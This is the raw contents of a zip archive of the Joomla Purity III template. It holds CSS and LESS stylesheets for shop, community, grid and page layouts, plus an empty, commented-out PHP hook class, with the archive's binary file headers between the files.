.com_mijoshop .box_oc #tab-related .box-product > div {
  width: auto;
}
.com_mijoshop .box_oc .box-content .content_oc p * {
  margin: 10px 10px 10px 0;
}
.com_mijoshop #header_oc {
  margin: 0 0 20px;
  padding: 0;
}
.com_mijoshop #header_oc #currency {
  top: 0;
}
.com_mijoshop #header_oc #currency a {
  margin-top: 5px;
}
.com_mijoshop #header_oc #cart {
  border-left: 1px solid #eeeeee;
  margin-left: 20px;
  top: 5px;
}
.com_mijoshop #header_oc #cart .heading {
  margin-top: 0;
}
.com_mijoshop #header_oc #search_oc {
  top: 10px;
  width: 120px;
}
.com_mijoshop #header_oc #search_oc input[type="text"] {
  border-radius: 0;
  height: 25px;
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
.com_mijoshop #header_oc .links {
  bottom: 0;
  top: auto;
}
.com_mijoshop #currency .dropdown-menu > li,
.com_mijoshop #top-links .dropdown-menu > li {
  border-color: #eeeeee;
}
.com_mijoshop #currency .dropdown-menu > li a:hover,
.com_mijoshop #top-links .dropdown-menu > li a:hover,
.com_mijoshop #currency .dropdown-menu > li a:focus,
.com_mijoshop #top-links .dropdown-menu > li a:focus {
  color: #ffffff;
}
.com_mijoshop #currency .open a,
.com_mijoshop #top-links .open a {
  color: #444444;
}
.com_mijoshop .mijoshop .product-thumb .image img {
  max-width: 100%;
  width: 100%;
}
.com_mijoshop .mijoshop .product-thumb .caption {
  padding: 15px !important;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 {
  margin: 0 0 10px;
  font-size: 15px;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 a {
  color: #444444;
}
.com_mijoshop .mijoshop .product-thumb .caption h4 a:hover,
.com_mijoshop .mijoshop .product-thumb .caption h4 a:focus {
  color: #10bf00;
}
.com_mijoshop .mijoshop .product-thumb .caption .price {
  font-weight: 700;
  color: #10bf00;
  margin-top: 10px !important;
}
.com_mijoshop .mijoshop .product-thumb .caption .price .price-tax {
  color: #999999;
  font-weight: 400;
}
.com_mijoshop #content_oc > h2 {
  margin-bottom: 30px;
  font-size: 24px;
}
.com_mijoshop #content_oc > p {
  padding: 10px 20px;
  border: 1px solid #eeeeee;
  margin-bottom: 20px !important;
  margin-top: 10px !important;
}
.com_mijoshop #content_oc .product-filter {
  padding-bottom: 10px;
}
.com_mijoshop #content_oc .product-filter .display {
  padding-top: 15px;
}
.com_mijoshop #content_oc .product-grid .product-thumb .caption {
  min-height: 200px !important;
}
.com_mijoshop #content_oc .product-list .product-thumb .image {
  padding: 0 20px 0 0;
  height: 200px;
}
.com_mijoshop #content_oc .product-list .product-thumb .image > a {
  height: 100%;
}
.com_mijoshop #content_oc .product-list .product-thumb .image img {
  max-width: 100%;
  max-height: 100%;
}
.com_mijoshop #content_oc .product-list .product-thumb .caption {
  overflow: hidden;
  margin: 0;
  padding: 20px 20px 20px 0 !important;
  min-height: 161px !important;
}
.com_mijoshop .product-info .left {
  width: 30% !important;
}
.com_mijoshop .product-info .right {
  min-height: 352px;
  width: 65% !important;
}
.com_mijoshop .product-info .right .description {
  border-top: 0;
  padding: 0 0 10px;
}
.com_mijoshop .product-info .right .cart div input[type="text"],
.com_mijoshop .product-info .right .cart div input[type="button"] {
  display: inline-block;
}
.com_mijoshop .product-info .right .cart div input[type="text"] {
  padding-left: 5px;
  padding-right: 5px;
}
.com_mijoshop .product-info .right .cart div span {
  color: #999999;
}
.com_mijoshop #tab-description,
.com_mijoshop #tab-review {
  padding: 20px;
}
.com_mijoshop .content_oc ul {
  list-style: none;
  margin: 0;
  padding: 0;
}
.com_mijoshop .cart-info .quantity input[type='text'] {
  -webkit-box-sizing: content-box;
  -moz-box-sizing: content-box;
  box-sizing: content-box;
  height: 28px;
  padding-top: 0;
  padding-bottom: 0;
}
.com_mijoshop .cart-module #coupon input,
.com_mijoshop .cart-module #voucher input {
  display: inline-block;
}
.com_mijoshop .cart-module #shipping table {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 20px;
}
.com_mijoshop .cart-module #shipping table td {
  padding: 10px 20px;
}
.com_mijoshop .box-category ul li {
  padding: 10px 10px 10px 0;
}
.com_mijoshop #colorbox {
  box-sizing: unset !important;
}
.com_mijoshop #column-right .row > div {
  width: 100%;
  float: none;
}
.com_mijoshop .t3-sidebar .mijoshop .container_oc .row > div {
  width: 100%;
  float: none;
}PKԜ�\X�_��9purity_iii/local/css/themes/vert/extras/com_community.cssnu&1i�.com_community #community-wrap label input,
.com_community #community-wrap .form-field input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .row-fluid.hero-area {
  margin: 0;
}
.com_community #community-wrap .cGuest .row-fluid.hero-area {
  margin-left: 0;
  margin-right: 0;
}
.com_community #community-wrap .js_dropDownMaster dt,
.com_community #community-wrap .js_dropDownParent li > a {
  height: 28px;
}
.com_community #community-wrap .joms-select {
  box-shadow: none;
}
.com_community #community-wrap .js-toolbar .navbar-inner {
  min-height: 40px;
}
.com_community #community-wrap .js-toolbar .nav-collapse {
  display: block;
}
.com_community #community-wrap .js-toolbar .nav > li > a {
  height: 38px;
  line-height: 25px;
}
.com_community #community-wrap .js-toolbar .dropdown-menu > li {
  border: 0;
}
.com_community #community-wrap .cStream-Content .row-fluid {
  margin-left: 0;
  margin-right: 0;
}
.com_community #community-wrap .joms-postbox-input .inputbox {
  box-shadow: none;
}
.com_community #community-wrap .joms-postbox-input .input-status {
  box-shadow: none;
  padding: 10px;
  overflow-y: auto;
  min-height: 160px !important;
}
.com_community #community-wrap .joms-postbox-input {
  overflow-y: scroll !important;
}
.com_community #community-wrap .joms-postbox-event .joms-postbox-dropdown .picker__select--month,
.com_community #community-wrap .joms-postbox-event .joms-postbox-dropdown .picker__select--year {
  display: inline-block;
}
.com_community #community-wrap .cProfile-Preferences .js_dropDownMaster dt,
.com_community #community-wrap .cProfile-Preferences .js_dropDownParent li > a {
  height: 26px;
  line-height: 20px;
}
.com_community #community-wrap .cProfile-Preferences label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .cSearch .label-checkbox input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .advance-search label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .cGroups-Create label input {
  display: inline-block;
  margin-top: 0;
  vertical-align: middle;
}
.com_community #community-wrap .joms-page .joms-form__group select,
.com_community #community-wrap .joms-page .joms-form__group textarea,
.com_community #community-wrap .joms-page .joms-form__group input[type="text"],
.com_community #community-wrap .joms-page .joms-form__group input[type="password"],
.com_community #community-wrap .joms-page .joms-form__group input[type="datetime"],
.com_community #community-wrap .joms-page .joms-form__group input[type="datetime-local"],
.com_community #community-wrap .joms-page .joms-form__group input[type="date"],
.com_community #community-wrap .joms-page .joms-form__group input[type="month"],
.com_community #community-wrap .joms-page .joms-form__group input[type="time"],
.com_community #community-wrap .joms-page .joms-form__group input[type="week"],
.com_community #community-wrap .joms-page .joms-form__group input[type="number"],
.com_community #community-wrap .joms-page .joms-form__group input[type="email"],
.com_community #community-wrap .joms-page .joms-form__group input[type="url"],
.com_community #community-wrap .joms-page .joms-form__group input[type="search"],
.com_community #community-wrap .joms-page .joms-form__group input[type="tel"],
.com_community #community-wrap .joms-page .joms-form__group input[type="color"],
.com_community #community-wrap .joms-page .joms-form__group .inputbox {
  display: inline-block;
}
.com_community #community-wrap .joms-page .joms-form__group .joms-button--privacy {
  margin-right: 15px;
}
.com_community #community-wrap .joms-page .joms-form__group .joms-checkbox input {
  margin-top: 8px;
}
.com_community #community-wrap .jomsocial .joms-body .joms-focus__header__actions--desktop a {
  font-size: 2.5rem;
}
.com_community #community-wrap .jomsocial .joms-body .joms-focus__header__actions--desktop .joms-icon {
  width: 24px;
  height: 24px;
}
.com_community #community-wrap .jomsocial .joms-body a.joms-button--viewed.nolink span {
  margin: 0;
  padding-left: 15px;
}PKԜ�\a\��	�	0purity_iii/local/css/themes/vert/legacy-grid.cssnu&1i�.row-fluid {
  margin-left: -15px;
  margin-right: -15px;
}
[class*="span"] {
  float: left;
}
.span1, .span2, .span3, .span4, .span5, .span6, .span7, .span8, .span9, .span10, .span11, .span12 {
  position: relative;
  min-height: 1px;
  padding-left: 15px;
  padding-right: 15px;
}
.span12 {
  width: 100%;
}
.span11 {
  width: 91.66666667%;
}
.span10 {
  width: 83.33333333%;
}
.span9 {
  width: 75%;
}
.span8 {
  width: 66.66666667%;
}
.span7 {
  width: 58.33333333%;
}
.span6 {
  width: 50%;
}
.span5 {
  width: 41.66666667%;
}
.span4 {
  width: 33.33333333%;
}
.span3 {
  width: 25%;
}
.span2 {
  width: 16.66666667%;
}
.span1 {
  width: 8.33333333%;
}
.offset12 {
  margin-left: 100%;
}
.offset11 {
  margin-left: 91.66666667%;
}
.offset10 {
  margin-left: 83.33333333%;
}
.offset9 {
  margin-left: 75%;
}
.offset8 {
  margin-left: 66.66666667%;
}
.offset7 {
  margin-left: 58.33333333%;
}
.offset6 {
  margin-left: 50%;
}
.offset5 {
  margin-left: 41.66666667%;
}
.offset4 {
  margin-left: 33.33333333%;
}
.offset3 {
  margin-left: 25%;
}
.offset2 {
  margin-left: 16.66666667%;
}
.offset1 {
  margin-left: 8.33333333%;
}
.offset0 {
  margin-left: 0%;
}
.visible-phone {
  display: none !important;
}
.visible-tablet {
  display: none !important;
}
.hidden-desktop {
  display: none !important;
}
.visible-desktop {
  display: inherit !important;
}
@media (min-width: 768px) and (max-width: 979px) {
  .hidden-desktop {
    display: inherit !important;
  }
  .visible-desktop {
    display: none !important;
  }
  .visible-tablet {
    display: inherit !important;
  }
  .hidden-tablet {
    display: none !important;
  }
}
@media (max-width: 767px) {
  .hidden-desktop {
    display: inherit !important;
  }
  .visible-desktop {
    display: none !important;
  }
  .visible-phone {
    display: inherit !important;
  }
  .hidden-phone {
    display: none !important;
  }
}
.width-10 {
  width: 10px;
}
.width-20 {
  width: 20px;
}
.width-30 {
  width: 30px;
}
.width-40 {
  width: 40px;
}
.width-50 {
  width: 50px;
}
.width-60 {
  width: 60px;
}
.width-70 {
  width: 70px;
}
.width-80 {
  width: 80px;
}
.width-90 {
  width: 90px;
}
.width-100 {
  width: 100px;
}
.height-10 {
  height: 10px;
}
.height-20 {
  height: 20px;
}
.height-30 {
  height: 30px;
}
.height-40 {
  height: 40px;
}
.height-50 {
  height: 50px;
}
.height-60 {
  height: 60px;
}
.height-70 {
  height: 70px;
}
.height-80 {
  height: 80px;
}
.height-90 {
  height: 90px;
}
.height-100 {
  height: 100px;
}PKԜ�\����5purity_iii/local/css/themes/vert/layouts/magazine.cssnu&1i�.magazine-item:before,
.magazine-featured-leading:before,
.magazine-featured-intro:before,
.magazine-category:before,
.magazine-item:after,
.magazine-featured-leading:after,
.magazine-featured-intro:after,
.magazine-category:after {
  content: " ";
  display: table;
}
.magazine-item:after,
.magazine-featured-leading:after,
.magazine-featured-intro:after,
.magazine-category:after {
  clear: both;
}
.magazine .page-subheader h2 {
  font-size: 42px;
}
.magazine-category-title {
  margin-bottom: 20px;
  font-size: 18px;
  background: #eeeeee;
  padding: 10px;
}
.magazine-category-title strong {
  font-weight: 600;
}
.magazine-category-title .fa {
  font-size: 14px;
  position: relative;
  top: -1px;
  left: 2px;
}
.magazine-category-title > a {
  display: inline-block;
  color: #444444;
  text-transform: uppercase;
}
.magazine-category-title > a:hover,
.magazine-category-title > a:active,
.magazine-category-title > a:focus {
  text-decoration: none;
  color: #10bf00;
}
.magazine-item .page-header {
  padding-bottom: 0;
  margin-bottom: 5px;
  border-bottom: 0;
}
.magazine-item .page-header h2 {
  margin: 0;
  font-size: 16px;
  line-height: 1.275;
  font-weight: 700;
}
.magazine-item .page-header h2 a:hover,
.magazine-item .page-header h2 a:active,
.magazine-item .page-header h2 a:focus {
  text-decoration: none;
}
.magazine-item .item-image {
  overflow: hidden;
}
.magazine-item .item-image,
.magazine-item .pull-left.item-image,
.magazine-item .pull-right.item-image {
  width: 100%;
  max-width: 100%;
  float: none !important;
  margin-bottom: 20px;
}
.magazine-item .item-image img,
.magazine-item .pull-left.item-image img,
.magazine-item .pull-right.item-image img,
.magazine-item .img_caption {
  width: 100% !important;
  max-width: 100%;
}
.magazine-item .article-aside {
  margin-top: 10px;
  margin-bottom: 10px;
}
.magazine-item .article-info {
  color: #999999;
  margin: 0;
  width: 100%;
}
.magazine-item .article-info dd {
  white-space: inherit;
}
.magazine-item-ct p:last-child {
  margin-bottom: 0;
}
.magazine-leading {
  margin-bottom: 20px;
}
.magazine-leading .magazine-item {
  margin-bottom: 20px;
}
.magazine-leading .magazine-item .page-header h2 {
  font-size: 35px;
}
@media screen and (min-width: 768px) {
  .magazine-leading .magazine-item .item-image {
    max-height: 300px;
  }
}
.magazine-leading .magazine-item .magazine-item-ct {
  font-size: 16px;
}
.magazine-intro {
  margin-bottom: 20px;
}
.magazine-intro .magazine-item {
  margin-bottom: 20px;
}
.magazine-intro .magazine-item .item-image {
  max-height: 120px;
}
.magazine-intro .magazine-item .item-image p.img_caption {
  display: none;
}
.magazine-links {
  margin-top: 40px;
}
.magazine-links::before {
  display: inline-block;
  content: "MORE NEWS";
  background: #444444;
  font-weight: normal;
  padding: 5px 10px;
  margin-bottom: 10px;
  color: #fff;
}
.magazine-links .link-item {
  border-bottom: 1px solid #eeeeee;
  padding: 10px 0 9px;
}
.magazine-links .page-header {
  margin: 0;
}
.magazine-links .page-header h2 {
  font-size: 16px;
}
.magazine-links .article-aside {
  margin-top: 5px;
  margin-bottom: 0;
}
.magazine-featured-links {
  margin-top: 0;
  margin-bottom: 40px;
}
.magazine-category {
  margin-bottom: 40px;
}
.magazine-category .row-articles {
  margin-bottom: 20px;
}
.magazine-category .row-articles:last-child {
  margin-bottom: 0;
}
@media screen and (min-width: 992px) {
  .magazine-category .row-articles .magazine-item-media {
    padding-right: 0;
  }
}
.magazine-category .magazine-leading {
  margin-bottom: 40px;
}
.magazine-category .magazine-item .category-name {
  display: none;
}
.magazine-category .magazine-item-ct {
  color: #666666;
  font-size: 12px;
}PKԜ�\�.��6purity_iii/local/css/themes/vert/layouts/corporate.cssnu&1i�.corporate .slideshow {
  background: #f7f7f7;
  border-bottom: 1px solid #eeeeee;
  padding: 40px 0;
}
.corporate .t3-sl-1 {
  border-bottom: 1px solid #eeeeee;
}
.corporate .t3-sl-1 .t3-module,
.corporate .t3-sl-2 .t3-module,
.corporate .t3-sl-3 .t3-module {
  margin-bottom: 0;
}
.corporate .t3-sl-2 {
  padding: 0;
}
.corporate .carousel-caption {
  background: rgba(0, 0, 0, 0.3);
}
.corporate .t3-module .media {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 10px;
}
.corporate .t3-module .media:last-child {
  border: 0;
  padding: 0;
}
.corporate .items-leading {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 40px;
}
.corporate .items-row {
  border-bottom: 1px solid #eeeeee;
}
.corporate .items-row:last-child {
  border: 0;
}PKԜ�\�h��1purity_iii/local/css/themes/vert/layouts/docs.cssnu&1i�.docs-section {
  margin-bottom: 40px;
}
.docs-section .page-header {
  margin-bottom: 20px;
}
.docs-section .page-header h1 {
  font-size: 42px;
}
.example-type h1,
.example-type h2,
.example-type h3,
.example-type h4,
.example-type h5,
.example-type h6 {
  margin: 20px 0;
}
.example-colors .swatch-item {
  width: 100%;
  min-height: 100px;
  position: relative;
  background: #444444;
  color: #fff;
  margin-bottom: 20px;
}
.example-colors .swatch-item dl {
  width: 100%;
  position: absolute;
  bottom: 0;
  padding: 20px;
  margin: 0;
}
.example-colors .color-brand-primary {
  background: #10bf00;
}
.example-colors .color-brand-secondary {
  background: #3e9b52;
}
.example-colors .color-brand-success {
  background: #3e9b52;
}
.example-colors .color-brand-danger {
  background: #cc0000;
}
.example-colors .color-brand-warning {
  background: #ff8800;
}
.example-colors .color-brand-info {
  background: #0099cc;
}
.example-colors .color-gray-darker {
  background: #222222;
}
.example-colors .color-gray-dark {
  background: #444444;
}
.example-colors .color-gray {
  background: #666666;
}
.example-colors .color-gray-light {
  background: #999999;
  color: #444444;
}
.example-colors .color-gray-lighter {
  background: #eeeeee;
  color: #444444;
}
.example-colors .color-gray-lightest {
  background: #f7f7f7;
  color: #444444;
}
.example-buttons .btn,
.example-inputs .btn,
.example-buttons .form-control,
.example-inputs .form-control {
  width: 100%;
  margin-bottom: 20px;
}PKԜ�\;purity_iii/local/css/themes/vert/layouts/features-intro.cssnu&1i�PKԜ�\U0((1purity_iii/local/css/themes/vert/layouts/blog.cssnu&1i�.blog .blog-item {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 40px;
  padding-bottom: 40px;
}
.blog .blog-item .item-image {
  margin-top: 7px;
  margin-right: 0;
}
.blog .blog-item .item-image.pull-left {
  max-width: 100%;
}
.blog .blog-item .item-image img {
  max-width: 100%;
  width: 100%;
}
.blog .blog-item .page-header {
  border: 0;
  margin: 0 0 10px;
  padding: 0;
}
.blog .blog-item .page-header h2 {
  margin: 0;
  line-height: 1.3;
}
.blog .blog-item .page-header h2 a:hover,
.blog .blog-item .page-header h2 a:focus,
.blog .blog-item .page-header h2 a:active {
  color: #0a7300;
}
.blog .blog-item .article-intro {
  margin-bottom: 20px;
}
.blog .item-page .tags {
  border-bottom: 1px solid #eeeeee;
  margin-bottom: 20px;
}
.blog .item-page .tags span a {
  background: #eeeeee;
}PKԜ�\�,�\!!5purity_iii/local/css/themes/vert/layouts/porfolio.cssnu&1i�.porfolio .page-header {
  text-align: center;
  border-bottom: 0;
  margin-top: 10px;
  margin-bottom: 0;
  padding: 0;
}
.porfolio-items {
  margin-top: 20px;
  padding-top: 20px;
  border-top: 1px solid #eeeeee;
  text-align: center;
}
.porfolio-items .thumbnail {
  border: 0;
  padding: 0;
  margin: 20px 0;
}
.porfolio-items .thumbnail > a {
  color: #444444;
  text-decoration: none;
}
.porfolio-items .thumbnail > a:hover,
.porfolio-items .thumbnail > a:active,
.porfolio-items .thumbnail > a:focus {
  color: #10bf00;
  text-decoration: none;
}
.porfolio-items .item-image {
  float: none !important;
  border: 1px solid #eeeeee;
  padding: 3px;
  position: relative;
  -webkit-transition: border-color 0.2s ease-in;
  -o-transition: border-color 0.2s ease-in;
  transition: border-color 0.2s ease-in;
}
.porfolio-items .item-image img {
  width: 100%;
  padding: 0;
}
.porfolio-items .thumbnail > a:hover .item-image,
.porfolio-items .thumbnail > a:active .item-image,
.porfolio-items .thumbnail > a:focus .item-image {
  border-color: #bbbbbb;
}
.porfolio-items .thumbnail > a:hover .item-image img,
.porfolio-items .thumbnail > a:active .item-image img,
.porfolio-items .thumbnail > a:focus .item-image img {
  opacity: .7;
}
.porfolio-items h3 {
  margin-top: 20px;
  margin-bottom: 5px;
  font-weight: 700;
  font-size: 18px;
}
.porfolio-items p {
  color: #666666;
  margin: 0;
}
.porfolio .item-state {
  width: 70px;
  height: 70px;
  background: url(../../../../../images/porfolio-item-states.png) no-repeat center top;
  display: block;
  text-indent: -9999em;
  position: absolute;
  top: -3px;
  right: -3px;
}
.porfolio .state-free {
  background-position: center;
}
.porfolio .state-hot {
  background-position: center bottom;
}
.porfolio .item-demo-url {
  display: inline-block;
  margin-top: 20px;
}PKԜ�\�����purity_iii/templateHook.phpnu&1i�<?php
/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */

// no direct access
defined('_JEXEC') or die('Restricted access');

/**
 * T3 Blank Helper class
 *
 * @package		T3 Blank
 */

/*
jimport('joomla.event.event');

class T3_BS3_BlankHook extends JEvent
{
	
	public function __construct(&$subject, $config)
	{
		parent::__construct($subject, $config);		
	}
	
	public function onT3Init() // no params
	{
		
	}

	public function onT3TplInit($t3app)
	{
		
	}

	public function onT3LoadLayout(&$path, $layout)
	{
		//T3::getApp()->addBodyClass('loadlayout');
	}

	public function onT3Spotlight(&$info, $name, $position)
	{
		
	}
	
	public function onT3Megamenu(&$menutype, &$config, &$levels)
	{
		
	}

	public function onT3BodyClass(&$class)
	{
		//$class[] = 'onbodyclass';
	}

	public function onT3BeforeCompileHead() // no params
	{
		
	}
	
	public function onT3BeforeRender() // no params
	{
		
	}
	
	public function onT3AfterRender() // no params
	{
		
	}
}

*/
?>PKԜ�\�ʱ��purity_iii/less/vars.lessnu&1i�/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */

// VARIABLES & MIXINS
// ------------------

// Prevent Bootstrap Upgrading errors
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/variables.less";

// Prevent T3 Upgrading errors
@import "../../../plugins/system/t3/base-bs3/less/variables.less";

// Template variables
@import "variables.less"; // Modify this for custom colors, font-sizes, etc

// Bootstrap mixins
@import "../../../plugins/system/t3/base-bs3/bootstrap/less/mixins.less";

// T3 mixins
@import "../../../plugins/system/t3/base-bs3/less/mixins.less";PKԜ�\�s	Ooopurity_iii/less/typography.lessnu&1i�/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */
 

// --------------------------------------------------
// CORE TYPOGRAPHY (type.less)
// --------------------------------------------------

//
// BODY TEXT
// --------------------------------------------------

// Paragraphs
// ----------
p {
  margin: 0 0 (@line-height-computed / 2);
}

.lead {
  margin-bottom: @line-height-computed;
  font-size: @t3-font-size-bigger;
  font-weight: 200;
  line-height: 1.4;
  @media (min-width: @screen-md) {
    font-size: @font-size-large;
  }
}


// Emphasis & misc
// ---------------

// Ex: 14px base font * 85% = about 12px
small, .small   { font-size: 85%; }

// Undo browser default styling
cite    { font-style: normal; }

// Contextual emphasis
.text-muted          { color: @text-muted; }
.text-primary        { color: @brand-primary; }
.text-warning        { color: @state-warning-text; }
.text-danger         { color: @state-danger-text; }
.text-success        { color: @state-success-text; }
.text-info           { color: @state-info-text; }

// Alignment
.text-left           { text-align: left; }
.text-right          { text-align: right; }
.text-center         { text-align: center; }
.text-justify        { text-align: justify; }

.text-center .item-image img  { margin: 0 auto; }

.inline {
  display: inline-block;
}

.inline + .inline {
  margin-left: @t3-global-margin;
}

// Highlight
.highlight {
  background-color: #FFC;
  font-weight: bold;
  padding: 1px 4px;
}



//
// HEADINGSS
// ------------------------------------------------------

h1, h2, h3, h4, h5, h6,
.h1, .h2, .h3, .h4, .h5, .h6 {
  color: @headings-color;
  font-family: @headings-font-family;
  font-weight: @headings-font-weight;
  line-height: @headings-line-height;
  small {
    font-weight: normal;
    line-height: 1;
    color: @headings-small-color;
  }
}

h1,
h2,
h3 {
  margin-top: @line-height-computed;
  margin-bottom: (@line-height-computed / 2);
}

h4,
h5,
h6 {
  margin-top: (@line-height-computed / 2);
  margin-bottom: (@line-height-computed / 2);
}

h1, .h1 { font-size: @font-size-h1; }
h2, .h2 { font-size: @font-size-h2; }
h3, .h3 { font-size: @font-size-h3; }
h4, .h4 { font-size: @font-size-h4; }
h5, .h5 { font-size: @font-size-h5; }
h6, .h6 { font-size: @font-size-h6; } 

h1 small, .h1 small { font-size: ceil(@font-size-base * 1.70); }
h2 small, .h2 small { font-size: ceil(@font-size-base * 1.25); }
h3 small, .h3 small,
h4 small, .h4 small { font-size: @font-size-base; }



//
// LISTS
// --------------------------------------------------

// Unordered and Ordered lists
// ----------------------------
ul,
ol {
  margin-top: 0;
  margin-bottom: (@line-height-computed / 2);
  ul,
  ol{
    margin-bottom: 0;
  }
}

// List options
// Unstyled keeps list items block level, just removes default browser padding and list-style
.list-unstyled {
  padding-left: 0;
  list-style: none;
}

// Inline turns list items into inline-block
.list-inline {
  .list-unstyled();
  > li {
    display: inline-block;
    padding-left: 5px;
    padding-right: 5px;
  }
}

// Description Lists
dl {
  margin-bottom: @line-height-computed;
}

dt,
dd {
  line-height: @line-height-base;
}

dt {
  font-weight: bold;
}

dd {
  margin-left: 0; // Undo browser default
}

// Horizontal description lists
//
// Defaults to being stacked without any of the below styles applied, until the
// grid breakpoint is reached (default of ~768px).

@media (min-width: @grid-float-breakpoint) {
  .dl-horizontal {
    dt {
      float: left;
      width: (@component-offset-horizontal - 20);
      clear: left;
      text-align: right;
      .text-overflow();
    }
    dd {
      margin-left: @component-offset-horizontal;
      .clearfix(); // Clear the floated `dt` if an empty `dd` is present
    }
  }
}



//
// MISC
// --------------------------------------------------

// Abbreviations and acronyms
// --------------------------
abbr[title],
// Added data-* attribute to help out our tooltip plugin, per https://github.com/twbs/bootstrap/issues/5257
abbr[data-original-title] {
  cursor: help;
  border-bottom: 1px dotted @abbr-border-color;
}
abbr.initialism {
  font-size: 90%;
  text-transform: uppercase;
}


// Blockquotes
// -----------
blockquote {
  padding: (@line-height-computed / 2) @line-height-computed;
  margin: 0 0 @line-height-computed;
  border-left: 5px solid @blockquote-border-color;
  p {
    font-size: (@font-size-base * 1.25);
    font-weight: 300;
    line-height: 1.5;
  }
  p:last-child {
    margin-bottom: 0;
  }
  small {
    display: block;
    line-height: @line-height-base;
    color: @blockquote-small-color;
    &:before {
      content: '\2014 \00A0';// EM DASH, NBSP
    }
  }

  // Float right with text-align: right
  &.pull-right {
    padding-right: 15px;
    padding-left: 0;
    border-right: 5px solid @blockquote-border-color;
    border-left: 0;
    p,
    small {
      text-align: right;
    }
    small {
      &:before {
        content: '';
      }
      &:after {
        content: '\00A0 \2014';// NBSP, EM DASH
      }
    }
  }
}


// Quotes
// ------
q:before,
q:after,
blockquote:before,
blockquote:after {
  content: "";
}


// Addresses
// ---------
address {
  display: block;
  margin-bottom: @line-height-computed;
  font-style: normal;
  line-height: @line-height-base;
}



//
// CODE (inline and block) (code.less)
// -----------------------------------
// Inline and block code styles
code,
kbd,
pre,
samp {
  font-family: @font-family-monospace;
}

// Inline code
code {
}

// Blocks of code
pre {
}


.our-team {
  clear: both;
  overflow: hidden;
}PKԜ�\����Z�Zpurity_iii/less/variables.lessnu&1i�/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */
 
//
// Variables
// --------------------------------------------------


// Global values
// --------------------------------------------------

// Grays
// -------------------------

@gray-darker:            #222;
@gray-dark:              #444;
@gray:                   #666;
@gray-light:             #999;
@gray-lighter:           #eee;
@gray-lightest:          #f7f7f7;


// Brand colors
// -------------------------

@brand-primary:         @blue;
@brand-secondary:       @green;
@brand-success:         @green;
@brand-warning:         @orange;
@brand-danger:          @red;
@brand-info:            @cyan;


// Accent colors
// -------------------------

@black:                 #000;
@white:                 #fff;
@blue:                  #07b;
@green:                 #3e9b52;
@cyan:                  #09c;
@red:                   #c00;
@yellow:                #fc0;
@orange:                #f80;
@pink:                  #d60a6c;
@purple:                #8b08ae;


// Scaffolding
// -------------------------

@body-bg:               #fff;
@text-color:            @gray-dark;


// Links
// -------------------------

@link-color:            @brand-primary;
@link-hover-color:      darken(@link-color, 15%);


// Typography
// -------------------------
@font-family-sans-serif:  "Helvetica Neue", Helvetica, Arial, sans-serif;
@font-family-serif:       Georgia, "Times New Romance", serif;
@font-family-monospace:   Consolas, Monaco, "Courier New", monospace;
@font-family-base:        @font-family-sans-serif;

@font-size-base:          14px;
@font-size-large:         ceil(@font-size-base * 1.25); // ~18px
@font-size-small:         ceil(@font-size-base * 0.85); // ~12px

@font-size-h1:            floor(@font-size-base * 3);
@font-size-h2:            floor(@font-size-base * 2.5);
@font-size-h3:            ceil(@font-size-base * 1.7);
@font-size-h4:            ceil(@font-size-base * 1.25);
@font-size-h5:            @font-size-base;
@font-size-h6:            ceil(@font-size-base * 0.85);

@line-height-base:        1.428571429; // 20/14
@line-height-computed:    floor(@font-size-base * @line-height-base); // ~20px

@headings-font-family:    @font-family-base;
@headings-font-weight:    500;
@headings-line-height:    1.1;
@headings-color:          inherit;


// Iconography
// -------------------------
@icon-font-name:          "glyphicons-halflings-regular";


// Components
// -------------------------
// Based on 14px font-size and 1.428 line-height (~20px to start)
@padding-base-vertical:          6px;
@padding-base-horizontal:        12px;

@padding-large-vertical:         10px;
@padding-large-horizontal:       16px;

@padding-small-vertical:         5px;
@padding-small-horizontal:       10px;

@line-height-large:              1.33;
@line-height-small:              1.5;

@border-radius-base:             0;
@border-radius-large:            0;
@border-radius-small:            0;

@component-active-color:         #fff;
@component-active-bg:            @brand-primary;

@caret-width-base:               4px;
